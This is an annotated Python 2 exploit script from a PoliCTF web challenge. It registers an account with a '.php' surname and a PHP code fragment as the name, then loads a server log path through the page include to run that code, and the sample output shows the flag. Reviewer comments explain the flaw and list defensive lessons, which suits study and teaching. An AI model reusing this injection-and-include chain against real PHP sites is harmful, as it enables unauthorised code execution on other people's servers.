#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
#
# CTF write-up script (the sample run below invokes it as ``web350.py``).
# Flow, as written here: register an account whose ``surname`` ends in
# ``.php``, log in, then fetch ``page=log/<host>_<surname-without-.php>``
# and regex the response for the text between ``name|`` and ``;surname``.
#
# Python 2 only: ``print`` statements and ``urllib2``.
import urllib, urllib2, re, sys, socket, random

if len(sys.argv) < 2:
    # argv[1] is the value sent as the ``name`` registration field.
    print "Usage: {0} {1}".format(sys.argv[0], "\"\"")
    sys.exit()

# Reverse-resolves the loopback address to a hostname; the author's note says
# to replace it with the client's own IP, so presumably the server derives the
# log file name from the connecting host (not verifiable from this script).
host = socket.gethostbyaddr("127.0.0.1")[0] #change to your ip
url_register = 'http://magic.polictf.it/index.php?page=register'
url_login = 'http://magic.polictf.it/index.php?page=login'
# ``{0}`` is the host part; exploit() appends ``_<surname stem>`` to it.
url_log = 'http://magic.polictf.it/index.php?page=log/{0}'.format(host)
# NOTE: rebinds the name ``random`` from the module to a numeric string;
# every later use of ``random`` in this file means this string.
random = str(random.randint(100,10000))
name = sys.argv[1]
# ``.php`` suffix is stripped again in exploit(); the page handler is presumably
# the one that adds the extension back when including the log — inferred from
# the sample run, not shown here.
surname = "{0}.php".format(random)
username = random
password = random

def register(name, surname, username, password):
    """POST the registration form; the response body is read and discarded."""
    post_data = urllib.urlencode({'name' : name, 'surname' : surname, 'username' : username, 'password' : password, 'register' : 'send'})
    req = urllib2.Request(url_register, post_data)
    # NOTE(review): ``resp`` is never inspected, so a failed registration
    # (e.g. duplicate username) is only noticed when the later steps fail.
    resp = urllib2.urlopen(req).read()

def login(username, password):
    """POST the login form; the response body is read and discarded.

    urllib2 has no cookie jar installed here, so any session cookie the
    server sets is not carried into the following request.
    """
    post_data = urllib.urlencode({'username' : username, 'password' : password, 'login' : 'login'})
    req = urllib2.Request(url_login, post_data)
    resp = urllib2.urlopen(req).read()

def exploit(url_log, surname):
    """GET ``<url_log>_<surname without '.php'>`` and return the body.

    Returns the raw response string; urllib2 raises HTTPError/URLError on
    failure (no timeout is set on the request).
    """
    log_path = "{0}_{1}".format(url_log, surname.replace(".php",""))
    req = urllib2.Request(log_path)
    resp = urllib2.urlopen(req).read()
    return resp

print "[*] Register with username: {0}".format(username)
register(name, surname, username, password)
print "[*] Login"
login(username, password)
print "[*] Exploit"
content = exploit(url_log, surname)
# ``key|value;`` is the layout of PHP's native session serialization, so the
# fetched page looks like it exposes a session record whose ``name`` entry is
# the attacker-supplied registration value — consistent with the flag text
# below pointing at session_regenerate_id(), but hedged: only the regex is
# visible here. Defensive takeaways: never build include/read paths from
# client-controlled fields (host name, profile fields), and regenerate the
# session id after authentication so a pre-known id cannot be reused.
result = re.search('name\|(.*)\;surname', content, re.DOTALL)
# NOTE(review): ``result`` is None when the pattern is absent, and
# ``.group(1)`` then raises AttributeError instead of a readable message.
print "[*] Result: \n",result.group(1)

'''
root@ubuntu:~# python web350.py "__call(); ?>"
[*] Register with username: 1337
[*] Login
[*] Exploit
[*] Result:
I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}
'''